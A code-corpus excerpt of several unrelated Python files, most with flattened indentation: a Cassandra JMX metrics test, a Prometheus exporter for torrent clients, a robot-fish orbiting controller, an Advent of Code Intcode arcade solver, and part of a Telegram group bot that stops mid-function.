        self.finished = False  # plain flag polled by run(); tearDown sets it to True
        self.metrics_aggregator = metrics_aggregator
        self.interval = 10
        self.metrics = None
        self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']])
log.info(metrics)
log.info(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "cassandra.db." in t['metric']]))
log.info(len(metrics))
self.assertTrue(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
exporter.py
|
import time
import os
import sys
import signal
import argparse
import threading
import faulthandler
from wsgiref.simple_server import make_server, WSGIRequestHandler, WSGIServer
try:
from urllib import quote_plus
from BaseHTTPServer import BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from urllib2 import (
build_opener, HTTPError, HTTPHandler, HTTPRedirectHandler, Request,
)
from urlparse import parse_qs, urlparse
except ImportError:
# Python 3
from http.server import BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote_plus, urlparse
from urllib.request import (
build_opener, HTTPHandler, HTTPRedirectHandler, Request,
)
import yaml
from loguru import logger
from attrdict import AttrDict
from prometheus_client import start_http_server, Metric, generate_latest, CONTENT_TYPE_LATEST, make_wsgi_app as old_make_wsgi_app
from prometheus_client.core import REGISTRY, CollectorRegistry
from prometheus_client.openmetrics import exposition as openmetrics
from downloader_exporter.deluge_exporter import DelugeMetricsCollector
from downloader_exporter.qbittorrent_exporter import QbittorrentMetricsCollector
from downloader_exporter.transmission_exporter import TransmissionMetricsCollector
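# The restricted_registry function below appears to backport ?name[] query
# filtering for older prometheus_client releases; it is monkey-patched onto
# CollectorRegistry just after its definition.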
def restricted_registry(self, names):
names = set(names)
collectors = set()
metrics = []
with self._lock:
if 'target_info' in names and self._target_info:
metrics.append(self._target_info_metric())
names.remove('target_info')
for name in names:
if name in self._names_to_collectors:
collectors.add(self._names_to_collectors[name])
for collector in collectors:
for metric in collector.collect():
metrics.append(metric)
class RestrictedRegistry(object):
def collect(self):
return metrics
return RestrictedRegistry()
# Monkey patch restricted_registry
CollectorRegistry.restricted_registry = restricted_registry
def choose_encoder(accept_header):
accept_header = accept_header or ''
for accepted in accept_header.split(','):
if accepted.split(';')[0].strip() == 'application/openmetrics-text':
return (openmetrics.generate_latest,
openmetrics.CONTENT_TYPE_LATEST)
return generate_latest, CONTENT_TYPE_LATEST
def bake_output(registry, accept_header, params):
"""Bake output for metrics output."""
encoder, content_type = choose_encoder(accept_header)
if 'name' in params:
registry = registry.restricted_registry(params['name'])
output = encoder(registry)
return str('200 OK'), (str('Content-Type'), content_type), output
def make_wsgi_app(registry=REGISTRY):
"""Create a WSGI app which serves the metrics from a registry."""
def prometheus_app(environ, start_response):
# Prepare parameters
accept_header = environ.get('HTTP_ACCEPT')
params = parse_qs(environ.get('QUERY_STRING', ''))
if environ['PATH_INFO'] == '/favicon.ico':
# Serve empty response for browsers
status = '200 OK'
header = ('', '')
output = b''
else:
# Bake output
status, header, output = bake_output(registry, accept_header, params)
# Return output
start_response(status, [header])
return [output]
return prometheus_app
class _SilentHandler(WSGIRequestHandler):
"""WSGI handler that does not log requests."""
def log_message(self, format, *args):
"""Log nothing."""
class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
daemon_threads = True
def start_wsgi_server(port, addr='', registry=REGISTRY):
"""Starts a WSGI server for prometheus metrics as a daemon thread."""
app = make_wsgi_app(registry)
httpd = make_server(addr, port, app, ThreadingWSGIServer, handler_class=_SilentHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
# Enable dumps on stderr in case of segfault
faulthandler.enable()
class SignalHandler():
def __init__(self):
self.shutdown = False
# Register signal handler
signal.signal(signal.SIGINT, self._on_signal_received)
signal.signal(signal.SIGTERM, self._on_signal_received)
def is_shutting_down(self):
return self.shutdown
def _on_signal_received(self, signal, frame):
logger.info("Exporter is shutting down")
self.shutdown = True
def main():
parser = argparse.ArgumentParser(description='BT clients stats exporter.')
parser.add_argument('-c', '--config', help='The path to config file', default='/config/config.yml')
parser.add_argument('-p', '--port', type=int, help='The port to use', default=9000)
parser.add_argument('--multi', action="store_true", help='Use different ports for each exporter')
args = parser.parse_args()
with open(args.config, 'r') as f:
config = yaml.safe_load(f)
# Register signal handler
signal_handler = SignalHandler()
# Register our custom collector
counter = 0
logger.info("Exporter is starting up")
for name, c in config.items():
client = c.get('client')
if client == 'qbittorrent':
collector = QbittorrentMetricsCollector(name=name, **c)
        elif client == 'deluge':
            collector = DelugeMetricsCollector(name=name, **c)
        elif client == 'transmission':
            collector = TransmissionMetricsCollector(name=name, **c)
else:
logger.warning(f"Unsupported client: {client}, config: {c}")
continue
if args.multi:
logger.info(f"Registering {name} at port {args.port+counter}")
start_http_server(args.port+counter, registry=collector)
else:
logger.info(f"Registering {name}")
REGISTRY.register(collector)
counter += 1
# Start server
if not args.multi:
start_wsgi_server(args.port, registry=REGISTRY)
logger.info(f"Exporter listening on port {args.port}")
while not signal_handler.is_shutting_down():
time.sleep(1)
logger.info("Exporter has shutdown")
if __name__ == '__main__':
main()
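# Hedged example (not from the original repo): the config.yml shape main()
# appears to expect -- a mapping of exporter name to client settings, where
# everything besides `client` is passed to the collector as **kwargs. The
# host/credential field names below are assumptions for illustration only:
#
#   qb-main:
#     client: qbittorrent
#     host: http://localhost:8080
#     username: admin
#     password: secret
#   deluge-box:
#     client: deluge
#     host: localhost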
|
exp_orbiting.py
|
"""Makes BlueBot around two vertically stacked lights
Contains generic vision based functions that can be used elsewhere including homing and depth control. Also contains depth control using the depth sensor and logger functions.
Attributes:
caudal (): Fin object for caudal fin
depth_ctrl (bool): Depth control from camera, [y/n]
depth_sensor (): DepthSensor object
dorsal (): Fin object for dorsal fin
ema (): EMA filter object
leds (): LED object
lock_depth (int): Depth control from depth sensor, 0=false, int=target_depth
pecto_l (): Fin object for pectoral left fin
pecto_r (): Fin object for pectoral right fin
status (str): BlueBot status in finite state machine
vision (): Vision object
"""
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import os
import csv
import time
import threading
import numpy as np
from math import *
from picamera import PiCamera
from lib_utils import *
from lib_photodiode import Photodiode
from lib_fin import Fin
from lib_leds import LEDS
from lib_vision import Vision
from lib_depthsensor import DepthSensor
from lib_ema import EMA
os.makedirs('./{}/'.format(U_FILENAME))
def initialize():
"""Initializes all threads which are running fins and a logger instance for the overall status
"""
threading.Thread(target=caudal.run).start()
threading.Thread(target=dorsal.run).start()
threading.Thread(target=pecto_l.run).start()
threading.Thread(target=pecto_r.run).start()
# logger instance for overall status
with open('./{}/{}_status.log'.format(U_FILENAME, U_FILENAME), 'w') as f:
f.truncate()
#f.write('t_passed :: t_capture:: t_blob :: t_uvw :: t_pqr :: t_xyz :: distance :: heading :: status\n')
f.write('t_passed :: distance :: heading :: status\n')
leds.on()
time.sleep(1)
leds.off()
def idle():
"""Waiting for starting signal
"""
thresh_photodiode = 20 # lights off: 2, lights on: 400 -> better range!
while photodiode.brightness > thresh_photodiode:
photodiode.update()
def terminate():
"""Terminates all threads which are running fins
"""
caudal.terminate()
dorsal.terminate()
pecto_l.terminate()
pecto_r.terminate()
leds.on()
time.sleep(1)
leds.off()
GPIO.cleanup()
'''
def log_status(t_passed, t_capture, t_blob, t_uvw, t_pqr, t_xyz, distance, heading, status):
with open('./{}/{}_status.log'.format(U_FILENAME, U_FILENAME), 'a') as f:
f.write(
' {:6.3f} :: {:6.3f} :: {:6.3f} :: {:6.3f} :: {:6.3f} :: {:6.3f} :: {:4.0f} :: {:4.0f} :: {}\n'.format(t_passed, t_capture, t_blob, t_uvw, t_pqr, t_xyz, distance, heading, status
)
)
'''
def log_status(t_passed, distance, heading, status):
"""Logs the overall status of BlueBot
Args:
t_passed (float): Time since the beginning of the experiment, [s]
distance (float): Distance to LED pair, [mm]
heading (float): x-position of an LED pair, [mm]
status (string): Status in the finite state machine
"""
with open('./{}/{}_status.log'.format(U_FILENAME, U_FILENAME), 'a') as f:
f.write(
' {:6.3f} :: {:4.0f} :: {:4.0f} :: {}\n'.format(t_passed, distance, heading, status
)
)
def log_centroids(t_passed, side, max_centroids):
"""Logs the (xyz) centroid positions observed in the last vision.update. If fewer than max_centroids are observed, remaining values will be padded with U_CAM_NRES.
Args:
t_passed (float): Time since the beginning of the experiment, [s]
        side (string): Right or left robot side
        max_centroids (int): Maximum number of centroids to log per side
"""
if (side == 'right'):
centroids = vision.xyz_r
elif (side == 'left'):
centroids = vision.xyz_l
centroid_list = U_CAM_NRES * np.ones((3, 3 * max_centroids)) # non-blob entries are set to U_CAM_NRES
if centroids.size:
centroid_list[:centroids.shape[0], :centroids.shape[1]] = centroids
centroid_list = np.transpose(centroid_list)
centroid_list = centroid_list.reshape((1, centroid_list.size))
with open('./{}/{}_centroids_{}.csv'.format(U_FILENAME, U_FILENAME, side), 'a') as f:
writer = csv.writer(f, delimiter=',')
row = []
row.append(t_passed)
#for i in range(blob_list.size):
for i in range(max_centroids):
row.append(centroid_list[0, i])
writer.writerow(row)
def depth_ctrl_from_cam():
"""Controls the diving depth to stay level with an observed object using both cameras. Swithes to depth sensor based depth control when on level with object.
The "pitch" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(p^2 + q^2)). A positive angle switches the dorsal fin on to move down. A negative angles switches the dorsal fin off to move up.
Returns:
(): Floats to the surface if no object observed
"""
pitch_range = 1 # abs(pitch) below which dorsal fin is not controlled
right = vision.pqr_r
left = vision.pqr_l
if not right.size and not left.size:
print('cant see blob')
dorsal.off()
return
if not right.size:
pitch_l = np.arctan2(left[2, 0], sqrt(left[0, 0]**2 + left[1, 0]**2)) * 180 / pi
pitch_r = pitch_l
elif not left.size:
pitch_r = np.arctan2(right[2, 0], sqrt(right[0, 0]**2 + right[1, 0]**2)) * 180 / pi
pitch_l = pitch_r
else:
pitch_r = np.arctan2(right[2, 0], sqrt(right[0, 0]**2 + right[1, 0]**2)) * 180 / pi
pitch_l = np.arctan2(left[2, 0], sqrt(left[0, 0]**2 + left[1, 0]**2)) * 180 / pi
pitch = (pitch_r + pitch_l) / 2
print(pitch)
if pitch > pitch_range:
print('move down')
dorsal.on()
elif pitch < -pitch_range:
print('move up')
dorsal.off()
# pressure sensor takeover. is not distance invariant, so start only when orbiting at fixed distance
if status == 'orbit' and abs(pitch) < pitch_range:
depth_sensor.update()
global lock_depth
lock_depth = depth_sensor.depth_mm # i.e., lock_depth not false anymore
global depth_ctrl
depth_ctrl = False
def depth_ctrl_from_depthsensor(thresh=2):
"""Controls the diving depth to a preset level
Args:
thresh (int, optional): Threshold below which dorsal fin is not controlled, [mm]
"""
depth_sensor.update()
if depth_sensor.depth_mm > (lock_depth + thresh):
dorsal.off()
elif depth_sensor.depth_mm < (lock_depth - thresh):
dorsal.on()
def home():
"""Controls the pectoral fins to follow an object using both cameras
The "heading" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(q^2 + p^2)). A positive angle switches the pectoral left fin on turn clockwise. A negative angles switches the pectoral right fin on to turn counterclockwise.
Returns:
(): Floats to the surface and turns on the spot if no object observed
"""
    caudal_range = 20 # abs(heading) below which the caudal fin is switched on
right = vision.pqr_r
left = vision.pqr_l
# blob behind or lost
if not right.size and not left.size:
#print('cant see blob')
pecto_r.set_frequency(6)
pecto_r.on()
pecto_l.off()
caudal.off()
return
# calculate headings
if not right.size:
heading_l = np.arctan2(left[1, 0], left[0, 0]) * 180 / pi
heading_r = heading_l
elif not left.size:
heading_r = np.arctan2(right[1, 0], right[0, 0]) * 180 / pi
heading_l = heading_r
else:
heading_r = np.arctan2(right[1, 0], right[0, 0]) * 180 / pi
heading_l = np.arctan2(left[1, 0], left[0, 0]) * 180 / pi
heading = (heading_r + heading_l) / 2
# blob to the right
if heading > 0:
freq_l = 5 + 5 * abs(heading) / 180
pecto_l.set_frequency(freq_l)
#print('turn cw')
pecto_l.on()
pecto_r.off()
if heading < caudal_range:
caudal.on()
else:
caudal.off()
# blob to the left
elif heading < 0:
freq_r = 5 + 5 * abs(heading) / 180
pecto_r.set_frequency(freq_r)
#print('turn ccw')
pecto_r.on()
pecto_l.off()
if heading > -caudal_range:
caudal.on()
else:
caudal.off()
def transition():
"""Transitions between homing and orbiting. Uses pectoral right fin to align tangentially with the orbit.
"""
caudal.off()
pecto_l.off()
pecto_r.set_frequency(8)
pecto_r.on()
right = vision.pqr_r
try:
heading = np.arctan2(right[1, 0], right[0, 0]) * 180 / pi
except:
return
if heading > 45:
pecto_r.off()
global status
status = 'orbit'
def orbit(target_dist):
"""Orbits an object, e.g. two vertically stacked LEDs, at a predefined radius
Uses four zones to control the orbit with pectoral and caudal fins. The problem is reduced to 2D and depth control is handled separately.
    Could make fin frequencies dependent on distance and heading, i.e., use proportional control.
Args:
target_dist (int): Target orbiting radius, [mm]
"""
try:
dist = np.linalg.norm(vision.xyz_r[:2, 0]) # 2D, ignoring z
heading = np.arctan2(vision.pqr_r[1, 0], vision.pqr_r[0, 0]) * 180 / pi
except:
return
if dist > target_dist:
if heading < 90:
#print('fwd')
caudal.set_frequency(2.2)
pecto_r.off()
pecto_l.off()
else:
#print('cw')
caudal.set_frequency(1.4)
pecto_l.set_frequency(8)
pecto_l.on()
pecto_r.off()
else:
if heading < 90:
#print('ccw')
caudal.set_frequency(2.2)
pecto_r.set_frequency(8)
pecto_r.on()
pecto_l.off()
else:
#print('fwd')
caudal.set_frequency(2.2)
pecto_r.off()
pecto_l.off()
def main(max_centroids, run_time=60, target_dist=500):
"""Runs vision update, depth control, status-based action, and logging iteratively
Args:
max_centroids (int): Maximum expected centroids in environment
run_time (int, optional): Experiment time [s]
target_dist (int, optional): Orbit radius, [mm]
"""
t_start = time.time()
while time.time() - t_start < run_time:
# check environment and find blob centroids of leds
try:
vision.update()
except:
continue
# control depth
if depth_ctrl:
depth_ctrl_from_cam()
elif lock_depth:
depth_ctrl_from_depthsensor()
# orbit if 2 blobs are visible
if vision.xyz_r.size:
            dist = np.linalg.norm(vision.xyz_r[:2, 0])  # 2D distance, consistent with orbit()
heading = np.arctan2(vision.pqr_r[1, 0], vision.pqr_r[0, 0]) * 180 / pi
elif vision.xyz_l.size:
            dist = np.linalg.norm(vision.xyz_l[:2, 0])  # 2D distance, consistent with orbit()
heading = np.arctan2(vision.pqr_l[1, 0], vision.pqr_l[0, 0]) * 180 / pi
else:
caudal.off()
pecto_r.off()
pecto_l.off()
            dist = target_dist + 1  # sentinel values for logging when no object is visible
            heading = target_dist + 1
# act based on status
global status
if status == 'home':
dist_filtered = ema.update_ema(dist)
if dist_filtered < target_dist * 1.6:
status = 'transition'
else:
home()
elif status == 'transition':
transition()
elif status == 'orbit':
caudal.on()
orbit(target_dist)
# log status and centroids
t_passed = time.time() - t_start
log_status(t_passed, dist, heading, status)
log_centroids(round(t_passed, 3), 'right', max_centroids)
log_centroids(round(t_passed, 3), 'left', max_centroids)
# homing plus orbiting, 2D or 3D
status = 'home' # ['home', 'transition', 'orbit']
depth_ctrl = True # 2D or 3D, [False, True]
lock_depth = False # use depth sensor once at target depth, set to mm value
max_centroids = 2 # maximum expected centroids in environment
caudal = Fin(U_FIN_C1, U_FIN_C2, 2.2) # freq, [Hz]
dorsal = Fin(U_FIN_D1, U_FIN_D2, 6) # freq, [Hz]
pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 8) # freq, [Hz]
pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 8) # freq, [Hz]
photodiode = Photodiode()
leds = LEDS()
vision = Vision(max_centroids)
depth_sensor = DepthSensor()
ema = EMA(0.3)
initialize()
idle()
leds.on()
main(max_centroids, 120, 400) # run time, target distance
leds.off()
terminate()
|
solution.py
|
import os
import threading
import queue
import time
from utils.grid_tools_2d import Point, Vector
from utils.intcode_computer import IntCodeComputer, get_program
import curses
debug_log = "debug.txt"
class Terminal:
tiles = {
0: " ",
1: "█",
2: "▒",
3: "=",
4: "*",
}
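    # Tile ids follow the Intcode arcade output spec: 0 empty, 1 wall, 2 block,
    # 3 horizontal paddle, 4 ball.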
def __init__(self, stdout=None, stdin=None, width=10, height=10, debug=False, log=None):
self.stdout = stdout
self.stdin = stdin
self.width = width
self.height = height
self.grid = self.generate_grid(width, height)
self.score = 0
self.running = False
self.debug = debug
self.log_file = log
self.screen = None
self.ai = AI(debug=debug, log=log)
def activate_curses(self):
self.log_debug("Activating Curses")
self.screen = curses.initscr()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
# self.screen.nodelay(True)
self.screen.keypad(True)
self.game_win = curses.newwin(self.height, self.width, 0, 0)
self.score_win = curses.newwin(10, self.width, self.height, 0)
self.score_win.addstr(0, 0, "=" * self.width)
self.score_win.addstr(2, 0, "=" * self.width)
def deactivate_curses(self):
self.log_debug("Deactivating Curses")
curses.nocbreak()
self.screen.keypad(False)
curses.echo()
curses.endwin()
def log_debug(self, message):
if self.debug:
if self.log_file:
self.log_file.write(message)
self.log_file.write("\n")
self.log_file.flush()
else:
print(message)
@staticmethod
def generate_grid(width, height):
grid = []
for _ in range(height):
grid.append([0]*width)
return grid
def update(self, x, y, value):
self.log_debug("Update: ({}, {}) {}".format(x, y, value))
if x == -1 and y == 0:
# Score Update
self.score = value
if self.screen:
self.score_win.addstr(1, 0, str(value))
self.score_win.refresh()
else:
# Tile Update
self.grid[y][x] = value
if self.screen:
self.game_win.addstr(y, x, self.tiles[value])
self.game_win.refresh()
def vanilla_render(self):
if not self.debug:
print(chr(27) + "[2J")
print("====================")
for row in self.grid:
line = ""
for tile_id in row:
line += self.tiles[tile_id]
print(line)
print("====================")
print(self.score)
print("====================")
def render(self):
if self.screen is None:
self.vanilla_render()
else:
self.screen.refresh()
self.game_win.refresh()
self.score_win.refresh()
def read_stdout(self):
if self.stdout is None:
value = int(input("Input:"))
elif hasattr(self.stdout, 'get'):
value = self.stdout.get()
# timeouts = 0
# while self.running and timeouts < self.MAX_TIMEOUTS:
# try:
# value = self.input_queue.get(timeout=self.READ_TIMEOUT)
# except queue.Empty:
# timeouts += 1
# if self.debug:
# print("Input Timeout {} ({})".format(timeouts, self.input_queue.qsize()))
elif hasattr(self.stdout, 'pop'):
value = self.stdout.pop(0)
else:
raise RuntimeError("Invalid input configured.")
return value
def read_input(self):
key = self.screen.getch()
if key == ord('q'):
# Quit
self.running = False
elif key == curses.KEY_LEFT:
# Left arrow ==> (Left Joystick Position)
self.stdin.put(-1)
elif key == curses.KEY_RIGHT:
# Right arrow ==> (Right Joystick Position)
self.stdin.put(1)
elif key == -1 or key == curses.KEY_DOWN:
# No input/Down arrow ==> (Neutral Joystick Position)
self.stdin.put(0)
else:
self.log_debug("Unknown Input: {}".format(key))
def ai_input(self):
try:
move = self.ai.get_next_move(self.grid)
except Exception as e:
self.log_debug(str(e))
move = 0
self.log_debug("AI Move: {}".format(move))
self.stdin.put(move)
def process_events(self):
if self.stdout.qsize() >= 3:
x = self.read_stdout()
y = self.read_stdout()
tile_id = self.read_stdout()
self.update(x, y, tile_id)
return True
return False
def run(self):
self.running = True
self.activate_curses()
try:
while self.running:
self.render()
if self.process_events():
continue # Keep processing
# time.sleep(0.15)
# self.read_input()
self.ai_input()
except Exception as e:
self.log_debug(str(e))
finally:
self.deactivate_curses()
class AI:
def __init__(self, debug=True, log=None):
self.debug = debug
self.log_file = log
def log(self, message):
if self.log_file:
self.log_file.write(message)
self.log_file.write("\n")
else:
print(message)
@staticmethod
def find_ball_location(grid):
for y, row in enumerate(grid):
for x, tile_id in enumerate(row):
if tile_id == 4:
return x, y
raise ValueError("No Ball in Grid!")
@staticmethod
def find_paddle_location(grid):
for y, row in enumerate(grid):
for x, tile_id in enumerate(row):
if tile_id == 3:
return x, y
raise ValueError("No Paddle in Grid!")
def get_next_move(self, grid):
ball = self.find_ball_location(grid)
if self.debug:
self.log("Ball Location: ({},{})".format(*ball))
paddle = self.find_paddle_location(grid)
if self.debug:
self.log("Paddle Location: ({},{})".format(*paddle))
if ball[0] < paddle[0]:
# Move Left
return -1
elif ball[0] > paddle[0]:
# Move Right
return 1
else:
# Freeze
return 0
def count_blocks(grid):
blocks = 0
for row in grid:
for tile_id in row:
if tile_id == 2:
blocks += 1
return blocks
def run(program):
terminal_socket = queue.Queue()
joystick_socket = queue.Queue()
with open(debug_log, mode="w") as log:
terminal = Terminal(terminal_socket, joystick_socket, width=38, height=22, debug=True, log=log)
computer = IntCodeComputer(
program, input_queue=joystick_socket, output_queue=terminal_socket, name="ArcadeCabinet",
debug=True, log=log
)
computation_thread = threading.Thread(target=lambda: computer.run(memory_allocation_size=10000))
gui_thread = threading.Thread(target=lambda: terminal.run())
try:
computation_thread.start()
gui_thread.start()
except:
computer.running = False
terminal.running = False
computation_thread.join()
while terminal_socket.qsize() > 0:
pass
terminal.running = False
gui_thread.join()
blocks = count_blocks(terminal.grid)
print(count_blocks(terminal.grid))
print(terminal.score)
return blocks
def tests():
    # NOTE: legacy smoke test (not called below); Terminal.run() expects
    # queue-like stdout/stdin, so a plain list still fails in process_events().
    t = Terminal(stdout=[1, 2, 3, 6, 5, 4], width=10, height=10)
t.run()
print("Tests Done")
class ArcadeCabinet(IntCodeComputer):
def __init__(self, program, name="ArcadeCabinet", debug=False, log=None):
super().__init__(program, name=name, debug=debug, log=log)
self.terminal = Terminal(width=38, height=22, debug=debug, log=log)
self.instruction = []
self.ai = AI(debug=debug, log=log)
def output(self, address):
value = self.program_memory[address]
self.instruction.append(value)
if len(self.instruction) == 3:
self.terminal.update(*self.instruction)
self.terminal.render()
self.instruction = []
def input(self, store):
value = self.ai.get_next_move(self.terminal.grid)
self.program_memory[store] = value
def run(self, noun=None, verb=None, memory_allocation_size=None):
self.terminal.activate_curses()
try:
super().run(noun=noun, verb=verb, memory_allocation_size=memory_allocation_size)
finally:
self.terminal.deactivate_curses()
if __name__ == "__main__":
# tests()
input_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "Input")
program = get_program(input_file)
# Insert 2 quarters
program[0] = 2
arcade = ArcadeCabinet(program)
arcade.run(memory_allocation_size=10000)
print("Blocks:", count_blocks(arcade.terminal.grid))
print("Score:", arcade.terminal.score)
if False:
while True:
program = get_program(input_file)
            # Insert 2 quarters
program[0] = 2
remaining_blocks = run(program)
if remaining_blocks == 0:
print("AI WON!")
break
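# Hedged usage note (illustration only): AI.get_next_move() tracks the ball
# (tile 4) with the paddle (tile 3) by comparing x-coordinates, e.g.
#   grid = [[0, 0, 0],
#           [0, 0, 4],
#           [3, 0, 0]]
#   AI(debug=False).get_next_move(grid)  # -> 1 (ball right of paddle, move right)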
|
advokado.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import schedule as schedule
import telebot
import configparser
import re
import time
from datetime import datetime, timedelta
import traceback
import threading
from database import DataBase
# import drawer  # TODO: check what is wrong with this module
config = configparser.ConfigParser()
config.read("config.ini")
# Assign config values to internal variables
token = config['Telegram']['token']
ADEPT_ID = int(config['Telegram']['ADEPT_ID'])
cw_ID = int(config['Telegram']['cw_ID'])
bot = telebot.TeleBot(token, True, 4)
last_pinned_msg = None
print('Arbeiten!')
def schedule_pending():
while True:
schedule.run_pending()
time.sleep(1)
thr = threading.Thread(target=schedule_pending)
thr.daemon = False
thr.start()
def go_to_arena():
print("go_to_arena")
msg = bot.send_message(ADEPT_ID, 'Время побеждать, гоу на арену')
bot.pin_chat_message(ADEPT_ID, msg.message_id)
def ping_for_battle():
try:
print('try ping_for_battle')
db = DataBase()
cur = db.select_data_pin_battle()
if len(cur) > 0:
for item in cur:
bot.send_message(item[1], 'Гоу в битву Adept @' + item[0])
except:
print("don't ping_for_battle. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(commands=['start'])
def start_message(message):
db = DataBase()
try:
data = [message.from_user.id, message.from_user.username, message.chat.id]
db.update_data_user(data)
db.close()
bot.send_message(message.chat.id, 'Привет моё сладенькое ADvokADo ' + message.from_user.username)
except:
print("don't insert from start_message. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(commands=['get_me'])
def get_me(message):
db = DataBase()
try:
data = [message.from_user.id, message.chat.id]
response = db.select_get_me(data)
if response:
# exp, gold, stock, hp, lastHit
result = 'Battle count = ' + str(response[0][0])
result += '\nExp = ' + str(response[0][1])
            result += '\nGold = ' + str(response[0][2])
result += '\nStock = ' + str(response[0][3])
result += '\nHp = ' + str(response[0][4])
result += '\nLast Hit = ' + str(response[0][5])
result += '\nKnockout = ' + str(response[0][6])
# result = '\n'.join('.'.join(map(str, s)) for s in query)
bot.send_message(message.chat.id, '<u><b>Summary:</b></u>\n\n' + result, parse_mode='HTML')
else:
bot.send_message(message.chat.id, 'Ты еще не нюхал пороха, воин ' + message.from_user.username)
db.close()
except:
print("don't get_me. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(commands=['get_topchik'])
def get_topchik_msg(message):
get_topchik(False)
def get_topchik(week=True):
db = DataBase()
try:
result = ''
response = db.select_top_count_battle(1, week)
if response:
result = '<u><b>Самый впрягающийся</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_last_hit(1, week)
if response:
result += '<u><b>Убийца</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_exp(1, week)
if response:
result += '<u><b>Самый опытный</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_gold(1, week)
if response:
result += '<u><b>Самый богатый</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_stock(1, week)
if response:
result += '<u><b>Самый запасливый</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_hp(1, week)
if response:
result += '<u><b>Человек-месиво</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
# result = '\n'.join('.'.join(map(str, s)) for s in query)
response = db.select_top_knockout(1, week)
if response:
result += '<u><b>Человек-зомби</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
# result = '\n'.join('.'.join(map(str, s)) for s in query)
db.close()
if result != '':
bot.send_message(ADEPT_ID, result, parse_mode='HTML')
else:
bot.send_message(ADEPT_ID, 'Нет еще топчика в этом чатике)')
except:
print("don't get_topchik. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(commands=['get_all'])
def get_all(message):
db = DataBase()
try:
response = db.select_get_all()
if response:
result = '\n'.join('\t'.join(map(str, s)) for s in response)
# drawer.create_image(result)
bot.send_photo(message.chat.id, photo=open('result.png', 'rb'))
# result = '\n'.join('.'.join(map(str, s)) for s in query)
# bot.send_message(message.chat.id, '<u><b>Summary:</b></u>\n\n' + result, parse_mode='HTML')
else:
bot.send_message(message.chat.id, 'Случилась какая-то херня с get_all')
db.close()
except:
print("don't get_all. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(content_types=["new_chat_members"])
def add_new_member(message):
try:
# user_list = message.new_chat_members
# print(user_list)
for user in message.new_chat_members:
bot.send_message(message.chat.id, "Welcome to Hell, @{0}!".format(user.username))
except:
print("don't add_new_member. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(content_types=["pinned_message"])
def save_pinned_message(message):
try:
global last_pinned_msg
last_pinned_msg = message.pinned_message
except:
print("don't save_pinned_message. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(content_types=["left_chat_member"])
def kick_member(message):
try:
bot.send_message(message.chat.id, "Go Home, {0}!".format(message.left_chat_member.username))
except:
print("don't kick_member. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(commands=['ping'])
def ping_message(message):
# print(message.chat.id)
